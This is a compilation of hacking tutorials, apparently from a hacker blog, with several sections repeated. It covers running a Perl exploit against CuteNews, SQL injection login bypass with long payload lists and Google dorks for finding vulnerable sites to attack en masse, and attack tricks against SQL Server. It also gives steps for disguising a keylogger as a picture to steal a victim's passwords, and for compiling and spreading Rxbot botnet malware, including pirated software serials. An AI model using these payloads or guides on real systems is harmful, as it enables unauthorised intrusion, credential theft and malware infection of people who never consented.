$username = "waraxe"; #Username is needed
$outfile = "./cute_log.txt2; # Log file
The text after the # are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.
Change the text within the "...." to the information relevant to the site that you are exploiting.
Finally run the exploit by typing into the command line:
perl exploit.pl
The output of your exploit, such as passwords, will be shown in the command prompt below.
Your done
Perl on Linux (Debian/Ubuntu):
Become root and install perl:
apt-get install perl
You are then able to run perl files by executing:
perl exploit.pl
Save the perl exploit to your home directory as exploit.pl.
Read through the perl file before running as often you need to define (change) the variables which are used throughout the exploit, such as the website name. These are always at the top of the program and look like:
Code:
$target = "http://localhost/cutenews.1.4.5/search.php";
$username = "waraxe"; #Username is needed
$outfile = "./cute_log.txt2; # Log file
The text after the # are comments (apart from the web address). This is so the programmer can give you information about what to do within the source code. Always read these as they give useful information.
Change the text within the "...." to the information relevant to the site that you are exploiting.
Finally run the exploit by typing:
perl exploit.pl
The output of your exploit, such as passwords, will be shown in the command prompt below.
What is SQL Injection and How to do It
One of the major problems with SQL is its poor security issues surrounding is the login and url strings.
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
this tutorial is not going to go into detail on why these string work as am not a coder i just know what i know and it works
SEARCH:
admin\login.asp
login.asp
with these two search string you will have plenty of targets to chose from...finding one thats vulnerable is another question
INJECTION STRINGS:HOW ?
this is the easiest part...very simple
on the login page just enter something like
user:admin (you dont even have to put this.)
pass:' or 1=1--
or
user:' or 1=1--
admin:' or 1=1--
some sites will have just a password so
password:' or 1=1--
infact i have compiled a combo list with strings like this to use on my chosen targets ....there are plenty of strings about , the list below is a sample of the most common used
there are many other strings involving for instance UNION table access via reading the error pages table structure
thus an attack with this method will reveal eventually admin U\P paths...but thats another paper
the one am interested in are quick access to targets
PROGRAM
i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit
of success with a combo list formatted this way,yesteday i loaded 40 eastern targets with 18 positive hits in a few minutes
how long would it take to go thought 40 sites cutting and pasting each string ??
combo example:
admin:' or a=a--
admin:' or 1=1--
and so on...it dont have to be admin can be anything you want... the most important part is example:' or 1=1-- this is our injection
string
now the only trudge part is finding targets to exploit...so i tend to search say google for login.asp or whatever
inurl:login.asp
index of:/admin/login.asp
like this: index of login.asp
result:
http://www3.google.com/search?hl=en&ie=ISO...G=Google+Search
17,000 possible targets trying various searches spews out plent more
now using proxys set in my browser i then click through interesting targets...seeing whats what on the site pages if interesting
i then cut and paste url as a possible target...after an hour or so you have a list of sites of potential targets like so
http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp
and so on...in a couple of hours you can build up quite a list...reason i dont sellect all results or spider for login pages is
i want to keep the noise level low...my ISP.. well enough said...plus atm am on dial-up so to slow for me
i then save the list fire up Ares and enter (1) a proxy list (2)my target IP list (3)my combo list...start..now i dont want to go into
problems with users using Ares..thing is i know it works for me...
sit back and wait...any target vulnerable with show up in the hits box...now when it finds a target it will spew all the strings on that site as vulnerable...you have to go through each one on the site by cutting and pasting the string till you find the right one..but the thing is you know you CAN access the site ...really i need a program that will return the hit with a click on url and ignore false outputs
am still looking....thing is it saves quite a bit of time going to each site and each string to find its not exploitable.
there you go you should have access to your vulnerable target by now
another thing you can use the strings in the urls were user=? edit the url to the = part and paste ' or 1=1-- so it becomes
user=' or 1=1-- just as quick as login process
(Variations)
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
happy hunting
Top 10 Tricks to exploit SQL Server Systems
Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.
Figure 1: Common SQL injection vulnerabilities found using WebInspect.
3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.
![[Image]](https://lh3-testonly.googleusercontent.com/blogger_img_proxy/AEn0k_tTyp809XqzWIoCmxJjTP1Ezwcir0IW1kXa4ijju4pDAr7IB5M733j_2kZpFJ9raRaALpPiQYDqfz93NfJl41ky8qZdy0a50WV1GuoAIr-Na-T12pIpCj1OJK5v29LrEp60e7nydeOr1oD0HauPAzrKBUmwXuBKdpGOMHzuYu6LziBlqJZGEYJNF6Uwws5uKyihcrNEdnW6gn7CjPHmtAvcqJ3h_D_gNjGQEVsZNjVh-3bnG_Lal8_YmcWD7Ylvxz_ittekiiWiEZpfBOWLluLyX-k=s0-d)
Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.
6. SQL injection
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.
![[Image]](https://lh3-testonly.googleusercontent.com/blogger_img_proxy/AEn0k_sMXxKNOvunL5DBSLcirJLMdKIyCDbOUmMZphgQ2veX1v6OeWUtSinCQw8eWfOeu78dUqDVRq2r1pu9O3qUQ8Yzq2wGcbNyoXaMzNXVtps55oNL8qc_A1v7bA1K2krvrOu-3JnBKRa9EvygNxUWWc4ocWhqtQGJgvupZocxObUGYlpJSZCKm2VT9rWFBJzM5xNJgPSZ7WE8pooEYVq0oW5GxZ06Fjo4azAdrMsxk3WC_xMrOfRKsZqmJxDzEa5UU4AEd8jHv0u2ZkmmAu5-A8UQn50=s0-d)
Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.
7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.
![[Image]](https://lh3-testonly.googleusercontent.com/blogger_img_proxy/AEn0k_shXTt9dR2dDk5w5uxdUxlKkpCHbFlwNQYeeaukhKc6827-3r3tdw_KAWz0Ifru6W3-oXCf1udkcd5YXnf2xlcNGtpc64_-06N70pDyATdRpBfMR-oYTdZFjTsoagiQMlgF9PfOwqjn5ySQk0cCllYkRbQM3eg6CNnLn8zRyFz4_V0-b9GAz1iLIoujVhwwzxVX7LDQANvLMPlMhtTV8DiY-_tkD4tLqnySDOAcMb9xe2IZgOSK8zpzGfz0C-4oIpLv8g7Nf8pabPLvjONBjxfB5oo=s0-d)
Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.
8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.
Figure 1: Common SQL injection vulnerabilities found using WebInspect.
3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.
Figure 2: SQL Server vulnerability exploitable using Metasploit's MSFConsole.
6. SQL injection
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector, shown in Figure 3.
Figure 3: SPI Dynamics' SQL Injector tool automates the SQL injection process.
7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe, shown in Figure 4, comes in handy.
Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.
8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
Installing a Keylogger on a Remote Machine
Note: This article is for educational purpose only and the author won’t be responsible for any kind of damage caused by following the information given in this article
Now to install a Keylogger on a Remote Computer you have to follow the steps given below:
First of all download Winspy keylogger software from link given below:
After downloading this software, run the .exe. You will be asked to register yourself where you will be asked to enter a Userid and Password. Remember this password as it will be required in uninstalling the software.
Now, another box will come, explaining you the hot keys(Ctrl + Shift + F12) to start the Winspy keylogger Software.
Now, on pressing hot keys, a login box will come asking userid and password. Enter them and click OK.
Now, Winspy’s main screen will be displayed as shown in image below:
Select Remote at top, then Remote install.
User - type in the victim’s nameAfter you have completed changing settings, click on “Create Remote file”. Now just add your picture to a winrar archive. Now, what you have to do is only send this keylog file to your victim. When victim will open this file, all keystrokes typed by victim will be sent to your email inbox. Thus, you will get all his passwords and thus will be able to hack his email accounts and even Myspace account password.
File name - Name the file to be sent. Use the name such that victim will love to accept it.
File icon - Keep it the same
Picture - select the picture you want to apply to the keylogger.
Email keylog to - Enter your Email address. Hotmail and Yahoo doesnot accept Keylog Files so enter other email address.
Thats it. This much is enough. If you want, can change other settings also.
Bypass login of web sites by SQL injection
For those of you who dont already know SQL injection is a technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a Web application for execution by a backend database. Attackers take advantage of the fact that programmers often chain together SQL commands with user provided parameters, and can therefore embed SQL commands inside these parameters. the result is that the attacker can execute arbitrary SQL queries and commands on the backend database server through the Web application.
A database is a table full of private and public site information such as usernames, products, etc. They are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL web applications interact with databases to dynamically build customized data views for each user.
Data types:
mysql.user
mysql.host
mysql.db
Bypassing login scripts:
SQL injection strings and the DB doesnt matter.
') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 *
" or 0=0 *
or 0=0 *
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
or a=a--
' or 1=1--
1' having '1'='1'--
' or 'x'='x--
foo'+OR+'1'='1
Note: having 1=1--
Example:
Login: hi'or 1=1--
Password: hi'or 1=1--
SQL commands:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transacti
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database
The input validation can also be bypassed bcz of the bad programming techniques.In most of the websites input validation is done at the client end i.e at the browser end using JAVASCRIPT. what u can do is open the page and then save the page in ur hard disk.Then open the HTML page in any HTML editor (say Frontpage or Dreamweaver or even notepad) and delete the code of input validation code of JAVA script and then simply go ahead
A database is a table full of private and public site information such as usernames, products, etc. They are fundamental components of Web applications. Databases enable Web applications to store data, preferences and content elements. Using SQL web applications interact with databases to dynamically build customized data views for each user.
Data types:
mysql.user
mysql.host
mysql.db
Bypassing login scripts:
SQL injection strings and the DB doesnt matter.
') OR ('a' = 'a
') OR ('1'-'1
'or''='
' OR '1=1
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 *
" or 0=0 *
or 0=0 *
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
' or 1=1--
or a=a--
' or 1=1--
1' having '1'='1'--
' or 'x'='x--
foo'+OR+'1'='1
Note: having 1=1--
Example:
Login: hi'or 1=1--
Password: hi'or 1=1--
SQL commands:
ABORT -- abort the current transaction
ALTER DATABASE -- change a database
ALTER GROUP -- add users to a group or remove users from a group
ALTER TABLE -- change the definition of a table
ALTER TRIGGER -- change the definition of a trigger
ALTER USER -- change a database user account
ANALYZE -- collect statistics about a database
BEGIN -- start a transaction block
CHECKPOINT -- force a transaction log checkpoint
CLOSE -- close a cursor
CLUSTER -- cluster a table according to an index
COMMENT -- define or change the comment of an object
COMMIT -- commit the current transaction
COPY -- copy data between files and tables
CREATE AGGREGATE -- define a new aggregate function
CREATE CAST -- define a user-defined cast
CREATE CONSTRAINT TRIGGER -- define a new constraint trigger
CREATE CONVERSION -- define a user-defined conversion
CREATE DATABASE -- create a new database
CREATE DOMAIN -- define a new domain
CREATE FUNCTION -- define a new function
CREATE GROUP -- define a new user group
CREATE INDEX -- define a new index
CREATE LANGUAGE -- define a new procedural language
CREATE OPERATOR -- define a new operator
CREATE OPERATOR CLASS -- define a new operator class for indexes
CREATE RULE -- define a new rewrite rule
CREATE SCHEMA -- define a new schema
CREATE SEQUENCE -- define a new sequence generator
CREATE TABLE -- define a new table
CREATE TABLE AS -- create a new table from the results of a query
CREATE TRIGGER -- define a new trigger
CREATE TYPE -- define a new data type
CREATE USER -- define a new database user account
CREATE VIEW -- define a new view
DEALLOCATE -- remove a prepared query
DECLARE -- define a cursor
DELETE -- delete rows of a table
DROP AGGREGATE -- remove a user-defined aggregate function
DROP CAST -- remove a user-defined cast
DROP CONVERSION -- remove a user-defined conversion
DROP DATABASE -- remove a database
DROP DOMAIN -- remove a user-defined domain
DROP FUNCTION -- remove a user-defined function
DROP GROUP -- remove a user group
DROP INDEX -- remove an index
DROP LANGUAGE -- remove a user-defined procedural language
DROP OPERATOR -- remove a user-defined operator
DROP OPERATOR CLASS -- remove a user-defined operator class
DROP RULE -- remove a rewrite rule
DROP SCHEMA -- remove a schema
DROP SEQUENCE -- remove a sequence
DROP TABLE -- remove a table
DROP TRIGGER -- remove a trigger
DROP TYPE -- remove a user-defined data type
DROP USER -- remove a database user account
DROP VIEW -- remove a view
END -- commit the current transaction
EXECUTE -- execute a prepared query
EXPLAIN -- show the execution plan of a statement
FETCH -- retrieve rows from a table using a cursor
GRANT -- define access privileges
INSERT -- create new rows in a table
LISTEN -- listen for a notification
LOAD -- load or reload a shared library file
LOCK -- explicitly lock a table
MOVE -- position a cursor on a specified row of a table
NOTIFY -- generate a notification
PREPARE -- create a prepared query
REINDEX -- rebuild corrupted indexes
RESET -- restore the value of a run-time parameter to a default value
REVOKE -- remove access privileges
ROLLBACK -- abort the current transacti
SELECT -- retrieve rows from a table or view
SELECT INTO -- create a new table from the results of a query
SET -- change a run-time parameter
SET CONSTRAINTS -- set the constraint mode of the current transaction
SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session
SET TRANSACTION -- set the characteristics of the current transaction
SHOW -- show the value of a run-time parameter
START TRANSACTION -- start a transaction block
TRUNCATE -- empty a table
UNLISTEN -- stop listening for a notification
UPDATE -- update rows of a table
VACUUM -- garbage-collect and optionally analyze a database
The input validation can also be bypassed bcz of the bad programming techniques.In most of the websites input validation is done at the client end i.e at the browser end using JAVASCRIPT. what u can do is open the page and then save the page in ur hard disk.Then open the HTML page in any HTML editor (say Frontpage or Dreamweaver or even notepad) and delete the code of input validation code of JAVA script and then simply go ahead
How To Create And Compile Botnets
i found a nice tut that helps u with the basics of the botnetsIn addition to Rxbot 7.6 modded in this tutorial, you can also use another good source. It is rx-asn-2-re-worked v3 is a stable mod of rxbot and it is 100% functional and not crippled. If you want to download it, you can below:
Download
Compiling is the same as it would be with Rxbot 7.6. I prefer this source but it would ultimately be best to compile your own bot/get a private one.
Q:What is a botnet?
A: A botnet is where you send a trojan to someone and when they open it a "bot" joins your channel on IRC(secretly, they don't know this)Once done the computer is now refered to as a "zombie".
Depending on the source you used, the bot can do several things.
I myself have helped write one of the most advanced and secure bot sources out there.
(Off topic)
But once again depending on the source you can :
Keylog their computer, take picutes of their screen, turn on their webcam and take pics/movies, harvest cdkeys and game keys or even cracks, passwords, aim screen names, emails, you can also spam, flood, DDoS, ping, packet, yada yada, some have built in md5 crackers, and clone functions to spamm other irc channels and overrun a channel and even perform IRC "Takeovers".
Once again depending on the bot it may be able to kill other fellow competeter bots.
Or even kill AV/FW apon startup.
Add itself to registry.
Open sites.
Open commands.
Cmd,
notepad,
html,
Anything is possible !
Theres the infected computers "bots" the attacker, the server, and the victim.
Botnets are being used for Google Adword click fraud, according to security watchers.
Now enough with all the quotes. As you can see, you can do anything with a botnet. Anything is possible. This is my bot and tutorial. You can host your bots on irc on a public server but I would recommend a private, password protected server. I will setup bots for people if they have something to offer.
---------------
Ignore anything about using the server editor but this tutorial show how to make an irc channel and spread bots:
Download tutorial
-----------------------------
Here we go ladies and gentlemen
Follow the tutorial:
-----------------------------
I. Setting up the C++ compilier: (easy)
1. Download Microsoft Visual C++ 6.0 Standard Edition (63.4 mb)
Mirror 2
Mirror 3 Direct
Pass: itzforblitz
Serial: 812-2224558
2. Run setup.exe and install. Remember to input serial
3. Download and install the Service Pack 6 (60.8 mb)
4. After that Download and install:
Windows SDK (1.2 mb)
Mirror 2
Mirror 3
Pass: itzforblitz
-------------------------------------
II. Configuring the C++ compilier (easy)
1. Open up Microsoft Visual C++ Compilier 6.0
2. Go to Tools > Options and Click the "Directories" tab
3. Now, browse to these directories and add them to the list: (Click the dotted box to add)
4. Now put them in this order: (use up and down arrows)
(it does not matter whats below those lines)
---------------------------------------
III. Configuring your bot: (easy)
1. Download and unpack:
Rxbot 7.6 (212.3 kb)
Mirror 2
Mirror 3
2. You should see an Rxbot 7.6 folder
3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:
-----------------------------------
IV. Building your bot: (very easy)
1. Make sure Microsoft Visual C++ is open
2. Select "File > Open Workspace"
3. Browse to your Rxbot 7.6 folder and open the rBot.dsw file
4. Right Click "rBot Files" and click Build:
5. rBot.exe will be in the Rxbot 7.6 > Debug folder !!!
YOUR DONE !!!! Now get the rbot and pack it (Use tool in third post and open rbot and click "Protect" and send it to some idiots, Follow tutorial on top to learn how to spread. Some good ways are: Torrents, AIM, Friends, Myspace, School computers, and P2P but there are more ways. ENJOY !
-------------------------------------
Command list
Download Command list
Basics:
.login botpassword will login bots
.logout will logout bots
.keylog on will turn keylogger on
.getcdkeys will retrieve cdkeys.
Read command list for more
-----------------------------------
Download mIRC
mIRC
Mirror 2
Mirror 3
--------------------------------------------------------------------------------------------
How to secure your bots:
Don't be an ~censored~, it is easy to steal bots. All you need is the irc server address and maybe a key.
To steal bots, watch for the @login key one must upload their bot to a direct link (tdotnetwork is execellent)
and update the channel topic and run:
The http://mybot.com is your bot's download link and the 82 can be any number(s)
Now steal their bots and have them join your channel
To find the server address you need their botnet. Then take their bot and open it in the server editor. Address will be shown and so will password and other needed information.
To secure your self:
It is fairly easy to secure your bots, here is how:
1. When you are in your right click on your chat window and select "Channel Modes"
2. Make sure these options are checked:
This way no one besides you or another op can set the channel topic
Note: Setting "Moderated" is good for when you are not there because anyone who is not voiced (+v) or and op (+o) cannot talk. They will still log in and follow commands however there will be no output.
------------------------------------------------------------------------
Good IRC Servers:
I would recommend running your botnet on a private server.
